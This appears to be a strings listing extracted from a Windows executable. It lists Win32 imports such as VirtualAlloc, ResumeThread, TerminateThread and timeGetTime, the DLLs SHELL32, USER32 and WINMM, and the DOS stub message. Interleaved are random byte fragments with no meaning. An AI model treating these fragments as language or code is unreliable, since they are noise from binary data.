ResetEvent
ResumeThread
	rz$ {
SetEvent
SetThreadPriority
SHELL32.dll
SHGetSpecialFolderPathA
StringFromCLSID
StringFromGUID2
TerminateThread
!This program cannot be run in DOS mode.
timeBeginPeriod
timeEndPeriod
timeGetDevCaps
timeGetTime
tu9.x,
t*u\j@
USER32.dll
VirtualAlloc
VirtualFree
WaitForMultipleObjects
WaitForSingleObject
WideCharToMultiByte
WINMM.dll
wsprintfA
\w_V:?i\
wvsprintfA
~W}Y]4
>X[j+m
@xlk1}
Xpt+?I
"*Y$6e
Y?70S]
yd8_1.
Yk,Vu 
-?z7wo
<z*tTk
z;U]}m
ZU]w)8